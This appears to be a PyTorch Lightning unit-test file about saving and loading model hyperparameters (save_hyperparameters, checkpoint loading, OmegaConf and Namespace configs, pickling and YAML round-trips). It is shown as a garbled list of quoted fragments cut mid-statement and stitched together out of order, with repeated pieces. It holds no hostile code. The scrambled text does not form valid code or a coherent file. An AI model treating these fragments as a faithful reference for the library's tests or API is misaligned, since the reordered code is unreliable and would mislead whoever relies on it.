isinstance(model, AggSubClassEvalModel):", "model2.hparams.batch_size == -17 def test_hparams_pickle(tmpdir): ad = AttributeDict({'key1': 1, 'key2':", "def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) def test_args(tmpdir): \"\"\" Test", "is intentionally here at the end @pytest.mark.parametrize(\"cls\", [ LocalVariableModelSuperFirst, #", "isinstance(model, DictConfSubClassEvalModel): assert isinstance(model.hparams.dict_conf, Container) assert model.hparams.dict_conf['my_param'] == 'anything' #", "assert model.hparams.batch_size == 99 def _raw_checkpoint_path(trainer) -> str: raw_checkpoint_paths =", "assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14 # verify", "32 model = cls(batch_size=179, **extra_args) assert model.hparams.batch_size == 179 if", "super().__init__(*args, **kwargs) def test_args(tmpdir): \"\"\" Test for inheritance: super class", "with explicit setter \"\"\" def __init__(self, hparams): super().__init__() self.hparams =", "raw_checkpoint_path = os.path.join(trainer.checkpoint_callback.dirpath, raw_checkpoint_path) return raw_checkpoint_path class LocalVariableModelSuperLast(EvalModelTemplate): \"\"\" This", "Trainer( default_root_dir=tmpdir, limit_train_batches=2, limit_val_batches=2, limit_test_batches=2, max_epochs=1, ) trainer.fit(model) path_yaml =", "assert model.hparams.test_arg2 == 120 def test_implicit_args_hparams(tmpdir): \"\"\" Tests that a", "return raw_checkpoint_path class LocalVariableModelSuperLast(EvalModelTemplate): \"\"\" This model has the super().__init__()", "torch from fsspec.implementations.local import LocalFileSystem from omegaconf import OmegaConf, Container", "SubClassEvalModel, SubSubClassEvalModel, AggSubClassEvalModel, UnconventionalArgsEvalModel, DictConfSubClassEvalModel, ]) def test_collect_init_arguments(tmpdir, cls): \"\"\"", "the property model3 = cls.load_from_checkpoint(raw_checkpoint_path, test_arg=78) assert model3.hparams.test_arg == 78", "= cls.load_from_checkpoint(raw_checkpoint_path) # assert model.hparams.my_arg == 42 class AnotherArgModel(EvalModelTemplate): def", "LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters() model = LocalModel(test_arg=14,", "only the initial hparams, no other runtime change allowed\"\"\" model", "other runtime change allowed\"\"\" model = cls(running_arg=123) assert model.hparams.running_arg ==", "property assignments assert model.hparams.test_arg == 14 # verify we can", "------------------------- def test_class_nesting(): class MyModule(LightningModule): def forward(self): ... # make", "can take an object \"\"\" def __init__(self, hparams): super().__init__() self.save_hyperparameters(hparams)", "loads correctly model2 = EvalModelTemplate.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.batch_size == -17 def", "torch.optim.Adam(self.parameters(), lr=0.02) @pytest.mark.parametrize(\"cls\", [ SimpleNoArgsModel, NoArgsSubClassEvalModel, ]) def test_model_nohparams_train_test(tmpdir, cls):", "== 1200 if isinstance(model, AggSubClassEvalModel): assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) # verify", "1200 if isinstance(model, AggSubClassEvalModel): assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) # verify that", "LocalVariableModelSuperFirst(EvalModelTemplate): \"\"\" This model has the _auto_collect_arguments() call at the", "LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['batch_size'] == 179 # verify that", "__init__(self, arg1, arg2): super().__init__() self.save_hyperparameters(arg1, arg2) @pytest.mark.parametrize(\"cls,config\", [ (AnotherArgModel, dict(arg1=42)),", "for \"self\", \"*args\" and \"**kwargs\". \"\"\" def __init__(obj, *more_args, other_arg=300,", "model = cls.load_from_checkpoint(raw_checkpoint_path) # assert model.hparams.my_arg == 42 class AnotherArgModel(EvalModelTemplate):", "model = cls(batch_size=179, **extra_args) assert model.hparams.batch_size == 179 if isinstance(model,", "that a model can take an object with explicit setter", "suite _run_standard_hparams_test(tmpdir, model, cls) @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_omega_conf_hparams(tmpdir, cls):", "saved the correct values trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) #", "path_yaml = os.path.join(tmpdir, 'testing-hparams.yaml') save_hparams_to_yaml(path_yaml, hparams) assert load_hparams_from_yaml(path_yaml) == hparams", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "]) def test_collect_init_arguments(tmpdir, cls): \"\"\" Test that the model automatically", "arg2, *args, **kwargs): super().__init__(*args, **kwargs) self.argument1 = arg1 # arg2", "= cls(arg1=1, arg2=2) assert 'local_var' not in model.hparams assert model.hparams['arg1']", "== 14 # verify we can train trainer = Trainer(default_root_dir=tmpdir,", "is intentionally here at the end class LocalVariableModelSuperFirst(EvalModelTemplate): \"\"\" This", "RuntimeParamChangeModelAssign]) def test_init_arg_with_runtime_change(tmpdir, cls): \"\"\"Test that we save/export only the", "class SaveHparamsModel(EvalModelTemplate): \"\"\" Tests that a model can take an", "Apache License, Version 2.0 (the \"License\"); # you may not", "verify that the checkpoint saved the correct values # trainer", "either express or implied. # See the License for the", "import os import pickle from argparse import Namespace import cloudpickle", "correct values trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) # verify that", "= _raw_checkpoint_path(trainer) model = LocalModel.load_from_checkpoint(raw_checkpoint_path, non_exist_kwarg=99) assert 'non_exist_kwarg' not in", "accept hparams and init in the super class \"\"\" def", "into the constructor \"\"\" # model = cls(config) # #", "that model loads correctly model2 = EvalModelTemplate.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.batch_size ==", "specific tests assert model.hparams.test_arg2 == 120 def test_implicit_args_hparams(tmpdir): \"\"\" Tests", "123 class UnsafeParamModel(BoringModel): def __init__(self, my_path, any_param=123): super().__init__() self.save_hyperparameters() def", "loads correctly model = cls.load_from_checkpoint(raw_checkpoint_path) assert model.hparams.batch_size == 179 if", "model = cls() trainer = Trainer( max_epochs=1, default_root_dir=tmpdir, ) train_loader", "batch, batch_nb): x, y = batch loss = F.cross_entropy(self(x), y)", "test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg', 'test_arg2') model = LocalModel(test_arg=14, test_arg2=90) #", "tae any argument in init.\"\"\" model = cls() trainer =", "'overwritten' assert model.hparams['arg2'] == 2 # @pytest.mark.parametrize(\"cls,config\", [ # (SaveHparamsModel,", "def __init__(self, my_path, any_param=123): super().__init__() self.save_hyperparameters() def test_model_with_fsspec_as_parameter(tmpdir): model =", "self.hparams = hparams # ------------------------- # STANDARD TESTS # -------------------------", "test_arg2): super().__init__() self.save_hyperparameters('test_arg', 'test_arg2') model = LocalModel(test_arg=14, test_arg2=90) # run", "hparam_type = type(model.hparams) # test proper property assignments assert model.hparams.test_arg", "[ EvalModelTemplate, SubClassEvalModel, SubSubClassEvalModel, AggSubClassEvalModel, UnconventionalArgsEvalModel, DictConfSubClassEvalModel, ]) def test_collect_init_arguments(tmpdir,", "model class LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg', 'test_arg2')", "179 if isinstance(model, AggSubClassEvalModel): assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) if isinstance(model, DictConfSubClassEvalModel):", "an unexpected keyword argument 'test'\"): SubClassVarArgs.load_from_checkpoint(raw_checkpoint_path) class RuntimeParamChangeModelSaving(BoringModel): def __init__(self,", "distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "The PyTorch Lightning team. # # Licensed under the Apache", "= Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) # make sure the raw checkpoint", "= cls(running_arg=123) assert model.hparams.running_arg == 123 model.hparams.running_arg = -1 assert", "SubClassVarArgs.load_from_checkpoint(raw_checkpoint_path) class RuntimeParamChangeModelSaving(BoringModel): def __init__(self, **kwargs): super().__init__() self.save_hyperparameters() class RuntimeParamChangeModelAssign(BoringModel):", "into the constructor \"\"\" extra_args = {} if cls is", "assert model.hparams.running_arg == -1 model.hparams = Namespace(abc=42) assert model.hparams.abc ==", "save/export only the initial hparams, no other runtime change allowed\"\"\"", "= 'overwritten' local_var = 1234 self.save_hyperparameters() # this is intentionally", "SubSubClassEvalModel(SubClassEvalModel): pass class AggSubClassEvalModel(SubClassEvalModel): def __init__(self, *args, my_loss=torch.nn.CrossEntropyLoss(), **kwargs): super().__init__(*args,", "test_arg2=90) # run standard test suite raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model,", "------------------------- def _run_standard_hparams_test(tmpdir, model, cls, try_overwrite=False): \"\"\" Tests for the", "if '.ckpt' in x] assert raw_checkpoint_paths raw_checkpoint_path = raw_checkpoint_paths[0] raw_checkpoint_path", "def __init__(self, **kwargs): super().__init__() self.hparams = kwargs @pytest.mark.parametrize(\"cls\", [RuntimeParamChangeModelSaving, RuntimeParamChangeModelAssign])", "def __init__(self, *args, subclass_arg=1200, **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() class SubSubClassEvalModel(SubClassEvalModel):", "pytest import torch from fsspec.implementations.local import LocalFileSystem from omegaconf import", "match=\"attribute 'pickle_me' removed from hparams because it cannot be pickled\"):", "LightningModule from pytorch_lightning.core.saving import save_hparams_to_yaml, load_hparams_from_yaml from pytorch_lightning.utilities import AttributeDict,", "specific tests assert model2.hparams.test_arg == 14 assert model2.hparams.mylist[0] == 15.4", "A model that has an attribute that cannot be pickled.", "make sure the raw checkpoint saved the properties raw_checkpoint_path =", "cls is AggSubClassEvalModel: extra_args.update(my_loss=torch.nn.CosineEmbeddingLoss()) elif cls is DictConfSubClassEvalModel: extra_args.update(dict_conf=OmegaConf.create(dict(my_param='anything'))) model", "EvalModelTemplate() # verify we can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=1)", "that do not tae any argument in init.\"\"\" model =", "os.listdir(trainer.checkpoint_callback.dirpath) raw_checkpoint_paths = [x for x in raw_checkpoint_paths if '.ckpt'", "models that do not tae any argument in init.\"\"\" model", "attribute that cannot be pickled. \"\"\" def __init__(self, foo='bar', pickle_me=(lambda", "\"\"\" hparam_type = type(model.hparams) # test proper property assignments assert", "_ = a.hparams class A: def test(self): a = MyModule()", "model = UnsafeParamModel(LocalFileSystem(tmpdir)) trainer = Trainer( default_root_dir=tmpdir, limit_train_batches=2, limit_val_batches=2, limit_test_batches=2,", "with pytest.raises(ValueError): _ = cls(**config) @pytest.mark.parametrize(\"past_key\", ['module_arguments']) def test_load_past_checkpoint(tmpdir, past_key):", "@pytest.mark.parametrize(\"cls\", [ SimpleNoArgsModel, NoArgsSubClassEvalModel, ]) def test_model_nohparams_train_test(tmpdir, cls): \"\"\"Test models", "# no matter how you do it, it should be", "the arguments are collected and not local variables. \"\"\" model", "= cls.load_from_checkpoint(raw_checkpoint_path) assert isinstance(model2.hparams, Container) # config specific tests assert", "test_init_arg_with_runtime_change(tmpdir, cls): \"\"\"Test that we save/export only the initial hparams,", "trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) # trainer.fit(model) # # #", "specific tests assert model.hparams.test_arg2 == 120 def test_explicit_missing_args_hparams(tmpdir): \"\"\" Tests", "model loads correctly # raw_checkpoint_path = _raw_checkpoint_path(trainer) # model =", "can take regular args and assign \"\"\" # define model", "if isinstance(model, AggSubClassEvalModel): assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) if isinstance(model, DictConfSubClassEvalModel): assert", "Tests that a model can take implicit args and assign", "trainer.fit(model) # # # verify that model loads correctly #", "save_hparams_to_yaml(path_yaml, AttributeDict(hparams)) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, OmegaConf.create(hparams)) assert load_hparams_from_yaml(path_yaml)", "isinstance(model, SubClassEvalModel): assert model.hparams.subclass_arg == 1200 if isinstance(model, AggSubClassEvalModel): assert", "]) def test_single_config_models_fail(tmpdir, cls, config): \"\"\" Test fail on passing", "{} if cls is AggSubClassEvalModel: extra_args.update(my_loss=torch.nn.CosineEmbeddingLoss()) elif cls is DictConfSubClassEvalModel:", "class \"\"\" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) def test_args(tmpdir):", "save_hparams_to_yaml, load_hparams_from_yaml from pytorch_lightning.utilities import AttributeDict, is_picklable from tests.base import", "from pytorch_lightning.core.saving import save_hparams_to_yaml, load_hparams_from_yaml from pytorch_lightning.utilities import AttributeDict, is_picklable", "_raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg']", "raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, LocalModel) model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=120) #", "named obj super().__init__(*more_args, **more_kwargs) obj.save_hyperparameters() class DictConfSubClassEvalModel(SubClassEvalModel): def __init__(self, *args,", "sure PL modules are always nn.Module a = MyModule() assert", "use this file except in compliance with the License. #", "arguments.\"\"\" class LocalModel(EvalModelTemplate): def __init__(self, batch_size=15): super().__init__(batch_size=batch_size) self.save_hyperparameters() model =", "= LocalModel() assert model.hparams.batch_size == 15 # verify that the", "import pytest import torch from fsspec.implementations.local import LocalFileSystem from omegaconf", "= Trainer( default_root_dir=tmpdir, limit_train_batches=2, limit_val_batches=2, limit_test_batches=2, max_epochs=1, ) trainer.fit(model) trainer.test()", "[ LocalVariableModelSuperFirst, # LocalVariableModelSuperLast, ]) def test_collect_init_arguments_with_local_vars(cls): \"\"\" Tests that", "any_param=123): super().__init__() self.save_hyperparameters() def test_model_with_fsspec_as_parameter(tmpdir): model = UnsafeParamModel(LocalFileSystem(tmpdir)) trainer =", "model, cls, try_overwrite=False): \"\"\" Tests for the existence of an", "positional arg, subclass takes varargs. \"\"\" hparams = dict(test=1) model", "arg2=2) assert 'local_var' not in model.hparams assert model.hparams['arg1'] == 'overwritten'", "*args, my_loss=torch.nn.CrossEntropyLoss(), **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() class UnconventionalArgsEvalModel(EvalModelTemplate): \"\"\" A", "\"**kwargs\". \"\"\" def __init__(obj, *more_args, other_arg=300, **more_kwargs): # intentionally named", "unconventional names for \"self\", \"*args\" and \"**kwargs\". \"\"\" def __init__(obj,", "@pytest.mark.parametrize(\"cls\", [ LocalVariableModelSuperFirst, # LocalVariableModelSuperLast, ]) def test_collect_init_arguments_with_local_vars(cls): \"\"\" Tests", "arg2 intentionally not set arg1 = 'overwritten' local_var = 1234", "no matter how you do it, it should be assigned", "test_single_config_models_fail(tmpdir, cls, config): \"\"\" Test fail on passing unsupported config", "torch.utils.data import DataLoader from pytorch_lightning import Trainer, LightningModule from pytorch_lightning.core.saving", "isinstance(model, AggSubClassEvalModel): assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) if isinstance(model, DictConfSubClassEvalModel): assert isinstance(model.hparams.dict_conf,", "this model should accept hparams and init in the super", "assert model.hparams['arg1'] == 'overwritten' assert model.hparams['arg2'] == 2 # @pytest.mark.parametrize(\"cls,config\",", "if try_overwrite: # verify that we can overwrite the property", "(SaveHparamsModel, Namespace(my_arg=42)), # (SaveHparamsModel, dict(my_arg=42)), # (SaveHparamsModel, OmegaConf.create(dict(my_arg=42))), # (AssignHparamsModel,", "SaveHparamsModel(EvalModelTemplate): \"\"\" Tests that a model can take an object", "cls(hparams={'test_arg': 14}) # run standard test suite _run_standard_hparams_test(tmpdir, model, cls)", "class arguments.\"\"\" class LocalModel(EvalModelTemplate): def __init__(self, batch_size=15): super().__init__(batch_size=batch_size) self.save_hyperparameters() model", "in compliance with the License. # You may obtain a", "cls) @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_omega_conf_hparams(tmpdir, cls): # init model", "cls): # init model conf = OmegaConf.create(dict(test_arg=14, mylist=[15.4, dict(a=1, b=2)]))", "software # distributed under the License is distributed on an", "def test_single_config_models_fail(tmpdir, cls, config): \"\"\" Test fail on passing unsupported", "pickle.dumps(ad) assert ad == pickle.loads(pkl) pkl = cloudpickle.dumps(ad) assert ad", "properties raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) raw_checkpoint[past_key] = raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]", "class NoArgsSubClassEvalModel(EvalModelTemplate): def __init__(self): super().__init__() class SimpleNoArgsModel(LightningModule): def __init__(self): super().__init__()", "in model.hparams # test_arg2 is not registered in class init", "self._hparams = None # pretend EvalModelTemplate did not call self.save_hyperparameters()", "Test that the model automatically saves the arguments passed into", "14 assert isinstance(model2.hparams, hparam_type) if try_overwrite: # verify that we", "14 # verify that model loads correctly model = LocalModel.load_from_checkpoint(raw_checkpoint_path,", "loss, 'log': {'train_loss': loss}} def configure_optimizers(self): return torch.optim.Adam(self.parameters(), lr=0.02) @pytest.mark.parametrize(\"cls\",", "**kwargs) def test_args(tmpdir): \"\"\" Test for inheritance: super class takes", "the super().__init__() call at the end. \"\"\" def __init__(self, arg1,", "we save/export only the initial hparams, no other runtime change", "14 assert model2.hparams.mylist[0] == 15.4 def test_explicit_args_hparams(tmpdir): \"\"\" Tests that", "= cls.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.test_arg == 14 assert isinstance(model2.hparams, hparam_type) if", "not tae any argument in init.\"\"\" model = cls() trainer", "trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) # make sure the raw", "do not tae any argument in init.\"\"\" model = cls()", "x + 1), **kwargs): super().__init__(**kwargs) assert not is_picklable(pickle_me) self.save_hyperparameters() def", "model = cls(arg1=1, arg2=2) assert 'local_var' not in model.hparams assert", "import save_hparams_to_yaml, load_hparams_from_yaml from pytorch_lightning.utilities import AttributeDict, is_picklable from tests.base", "cls.load_from_checkpoint(raw_checkpoint_path, batch_size=99) assert model.hparams.batch_size == 99 def _raw_checkpoint_path(trainer) -> str:", "= a.hparams def test2(self): test_outside() test_outside() A().test2() A().test() class SubClassEvalModel(EvalModelTemplate):", "super().__init__() self.save_hyperparameters('test_arg', 'test_arg2') model = LocalModel(test_arg=14, test_arg2=90) # run standard", "# this is intentionally here at the end @pytest.mark.parametrize(\"cls\", [", "trainer.logger.NAME_HPARAMS_FILE) hparams = load_hparams_from_yaml(path_yaml) assert hparams.get('running_arg') == 123 class UnsafeParamModel(BoringModel):", "default_root_dir=tmpdir, ) train_loader = DataLoader(TrialMNIST(os.getcwd(), train=True, download=True), batch_size=32) trainer.fit(model, train_loader)", "NoArgsSubClassEvalModel, ]) def test_model_nohparams_train_test(tmpdir, cls): \"\"\"Test models that do not", "assert model.hparams.batch_size == 32 model = cls(batch_size=179, **extra_args) assert model.hparams.batch_size", "model = cls.load_from_checkpoint(raw_checkpoint_path, batch_size=99) assert model.hparams.batch_size == 99 def _raw_checkpoint_path(trainer)", "it, it should be assigned # assert model.hparams.my_arg == 42", "automatically saves the arguments passed into the constructor \"\"\" #", "dict_conf=OmegaConf.create(dict(my_param='something')), **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() @pytest.mark.parametrize(\"cls\", [ EvalModelTemplate, SubClassEvalModel, SubSubClassEvalModel,", "raw_checkpoint_path = _raw_checkpoint_path(trainer) # model = cls.load_from_checkpoint(raw_checkpoint_path) # assert model.hparams.my_arg", "def training_step(self, batch, batch_nb): x, y = batch loss =", "PL modules are always nn.Module a = MyModule() assert isinstance(a,", "'Namespace' raw_checkpoint[past_key]['batch_size'] = -17 del raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] # save back the", "and not local variables. \"\"\" model = cls(arg1=1, arg2=2) assert", "class SuperClassPositionalArgs(EvalModelTemplate): def __init__(self, hparams): super().__init__() self._hparams = None #", "\"\"\" def __init__(obj, *more_args, other_arg=300, **more_kwargs): # intentionally named obj", "arguments passed into the constructor \"\"\" extra_args = {} if", "limit_train_batches=2, limit_val_batches=2, limit_test_batches=2, max_epochs=1, ) trainer.fit(model) path_yaml = os.path.join(trainer.logger.log_dir, trainer.logger.NAME_HPARAMS_FILE)", "with the License. # You may obtain a copy of", "not set arg1 = 'overwritten' local_var = 1234 self.save_hyperparameters() #", "config type. \"\"\" with pytest.raises(ValueError): _ = cls(**config) @pytest.mark.parametrize(\"past_key\", ['module_arguments'])", "dict(a=1, b=2)])) model = cls(hparams=conf) assert isinstance(model.hparams, Container) # run", "# assert model.hparams.my_arg == 42 class AnotherArgModel(EvalModelTemplate): def __init__(self, arg1):", "verify that model loads correctly model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.test_arg", "max_epochs=1) trainer.fit(model) # verify that we can overwrite whatever we", "test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg') model = LocalModel(test_arg=14, test_arg2=90) # test", "Namespace(my_arg=42)), # (AssignHparamsModel, dict(my_arg=42)), # (AssignHparamsModel, OmegaConf.create(dict(my_arg=42))), # ]) #", "= cls.load_from_checkpoint(raw_checkpoint_path, test_arg=78) assert model3.hparams.test_arg == 78 return raw_checkpoint_path @pytest.mark.parametrize(\"cls\",", "= EvalModelTemplate.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.batch_size == -17 def test_hparams_pickle(tmpdir): ad =", "str: raw_checkpoint_paths = os.listdir(trainer.checkpoint_callback.dirpath) raw_checkpoint_paths = [x for x in", "cls, config): \"\"\" Test fail on passing unsupported config type.", "def __init__(self, *args, my_loss=torch.nn.CrossEntropyLoss(), **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() class UnconventionalArgsEvalModel(EvalModelTemplate):", "set arg1 = 'overwritten' local_var = 1234 self.save_hyperparameters() # this", "def __init__(self, **kwargs): super().__init__() self.save_hyperparameters() class RuntimeParamChangeModelAssign(BoringModel): def __init__(self, **kwargs):", "Copyright The PyTorch Lightning team. # # Licensed under the", "express or implied. # See the License for the specific", "from tests.base import EvalModelTemplate, TrialMNIST, BoringModel class SaveHparamsModel(EvalModelTemplate): \"\"\" Tests", "except in compliance with the License. # You may obtain", "is DictConfSubClassEvalModel: extra_args.update(dict_conf=OmegaConf.create(dict(my_param='anything'))) model = cls(**extra_args) assert model.hparams.batch_size == 32", "model loads correctly model2 = EvalModelTemplate.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.batch_size == -17", "argument in init.\"\"\" model = cls() trainer = Trainer( max_epochs=1,", "assert 'local_var' not in model.hparams assert model.hparams['arg1'] == 'overwritten' assert", "Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path)", "trainer = Trainer( default_root_dir=tmpdir, limit_train_batches=2, limit_val_batches=2, limit_test_batches=2, max_epochs=1, ) trainer.fit(model)", "test suite raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, cls) model2 = cls.load_from_checkpoint(raw_checkpoint_path)", "# Licensed under the Apache License, Version 2.0 (the \"License\");", "in raw_checkpoint_paths if '.ckpt' in x] assert raw_checkpoint_paths raw_checkpoint_path =", "CONDITIONS OF ANY KIND, either express or implied. # See", "_run_standard_hparams_test(tmpdir, model, cls) @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_dict_hparams(tmpdir, cls): #", "model = UnpickleableArgsEvalModel() trainer = Trainer(default_root_dir=tmpdir, max_steps=1) with pytest.warns(UserWarning, match=\"attribute", "test_outside() test_outside() A().test2() A().test() class SubClassEvalModel(EvalModelTemplate): any_other_loss = torch.nn.CrossEntropyLoss() def", "\"\"\" def __init__(self, hparams): super().__init__() self.save_hyperparameters(hparams) class AssignHparamsModel(EvalModelTemplate): \"\"\" Tests", "raw_checkpoint_path = _raw_checkpoint_path(trainer) model = LocalModel.load_from_checkpoint(raw_checkpoint_path, non_exist_kwarg=99) assert 'non_exist_kwarg' not", "Tests that a model can take an object with explicit", "return raw_checkpoint_path # ------------------------- # SPECIFIC TESTS # ------------------------- def", "that model loads correctly model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=123) assert model.hparams.test_arg", "model automatically saves the arguments passed into the constructor \"\"\"", "super().__init__() self.save_hyperparameters() def test_model_with_fsspec_as_parameter(tmpdir): model = UnsafeParamModel(LocalFileSystem(tmpdir)) trainer = Trainer(", "SPECIFIC TESTS # ------------------------- def test_class_nesting(): class MyModule(LightningModule): def forward(self):", "cls) model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert isinstance(model2.hparams, Container) # config specific", "# (SaveHparamsModel, OmegaConf.create(dict(my_arg=42))), # (AssignHparamsModel, Namespace(my_arg=42)), # (AssignHparamsModel, dict(my_arg=42)), #", "# (SaveHparamsModel, Namespace(my_arg=42)), # (SaveHparamsModel, dict(my_arg=42)), # (SaveHparamsModel, OmegaConf.create(dict(my_arg=42))), #", "in x] assert raw_checkpoint_paths raw_checkpoint_path = raw_checkpoint_paths[0] raw_checkpoint_path = os.path.join(trainer.checkpoint_callback.dirpath,", "= arg1 # arg2 intentionally not set arg1 = 'overwritten'", "assert model.hparams.test_arg == 14 # verify we can train trainer", "Trainer(default_root_dir=tmpdir, max_steps=1) with pytest.warns(UserWarning, match=\"attribute 'pickle_me' removed from hparams because", "model = cls(**extra_args) assert model.hparams.batch_size == 32 model = cls(batch_size=179,", "os import pickle from argparse import Namespace import cloudpickle import", "model, cls) model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert isinstance(model2.hparams, Container) # config", "conf = OmegaConf.create(dict(test_arg=14, mylist=[15.4, dict(a=1, b=2)])) model = cls(hparams=conf) assert", "trainer.fit(model) # verify that we can overwrite whatever we want", "OmegaConf.create(hparams)) assert load_hparams_from_yaml(path_yaml) == hparams class NoArgsSubClassEvalModel(EvalModelTemplate): def __init__(self): super().__init__()", "test_collect_init_arguments_with_local_vars(cls): \"\"\" Tests that only the arguments are collected and", "want raw_checkpoint_path = _raw_checkpoint_path(trainer) model = LocalModel.load_from_checkpoint(raw_checkpoint_path, non_exist_kwarg=99) assert 'non_exist_kwarg'", "# run standard test suite raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, cls)", "assert model.hparams.abc == 42 trainer = Trainer( default_root_dir=tmpdir, limit_train_batches=2, limit_val_batches=2,", "= type(model.hparams) # test proper property assignments assert model.hparams.test_arg ==", "torch.nn.CrossEntropyLoss() def __init__(self, *args, subclass_arg=1200, **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() class", "collected and not local variables. \"\"\" model = cls(arg1=1, arg2=2)", "return raw_checkpoint_path @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_namespace_hparams(tmpdir, cls): # init", "# \"\"\" Test that the model automatically saves the arguments", "torch.nn.CosineEmbeddingLoss) # verify that the checkpoint saved the correct values", "class LocalVariableModelSuperLast(EvalModelTemplate): \"\"\" This model has the super().__init__() call at", "model takes only valid class arguments.\"\"\" class LocalModel(EvalModelTemplate): def __init__(self,", "TESTS # ------------------------- def _run_standard_hparams_test(tmpdir, model, cls, try_overwrite=False): \"\"\" Tests", "init return raw_checkpoint_path # ------------------------- # SPECIFIC TESTS # -------------------------", "\"\"\" Test that the model automatically saves the arguments passed", "at the end class LocalVariableModelSuperFirst(EvalModelTemplate): \"\"\" This model has the", "raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] raw_checkpoint['hparams_type'] = 'Namespace' raw_checkpoint[past_key]['batch_size'] = -17 del raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] #", "= LocalModel.load_from_checkpoint(raw_checkpoint_path, non_exist_kwarg=99) assert 'non_exist_kwarg' not in model.hparams class SuperClassPositionalArgs(EvalModelTemplate):", "the correct values trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) # verify", "model.hparams.running_arg = -1 assert model.hparams.running_arg == -1 model.hparams = Namespace(abc=42)", "DictConfSubClassEvalModel, ]) def test_collect_init_arguments(tmpdir, cls): \"\"\" Test that the model", "test_args(tmpdir): \"\"\" Test for inheritance: super class takes positional arg,", "= LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=123) assert model.hparams.test_arg == 14 assert 'test_arg2' not", "class LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters() model =", "**extra_args) assert model.hparams.batch_size == 179 if isinstance(model, SubClassEvalModel): assert model.hparams.subclass_arg", "assert model.hparams.batch_size == 179 if isinstance(model, AggSubClassEvalModel): assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss)", "raw_checkpoint[past_key] = raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] raw_checkpoint['hparams_type'] = 'Namespace' raw_checkpoint[past_key]['batch_size'] = -17 del", "Test for inheritance: super class takes positional arg, subclass takes", "saves the arguments passed into the constructor \"\"\" extra_args =", "LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=120) # config specific tests assert model.hparams.test_arg2 == 120", "**kwargs): super().__init__(**kwargs) assert not is_picklable(pickle_me) self.save_hyperparameters() def test_hparams_pickle_warning(tmpdir): model =", "DataLoader from pytorch_lightning import Trainer, LightningModule from pytorch_lightning.core.saving import save_hparams_to_yaml,", "test_outside(): a = MyModule() _ = a.hparams class A: def", "batch_size=32) trainer.test(test_dataloaders=test_loader) def test_model_ignores_non_exist_kwargument(tmpdir): \"\"\"Test that the model takes only", "define model class LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters()", "'test_arg=14' \"\"\" hparam_type = type(model.hparams) 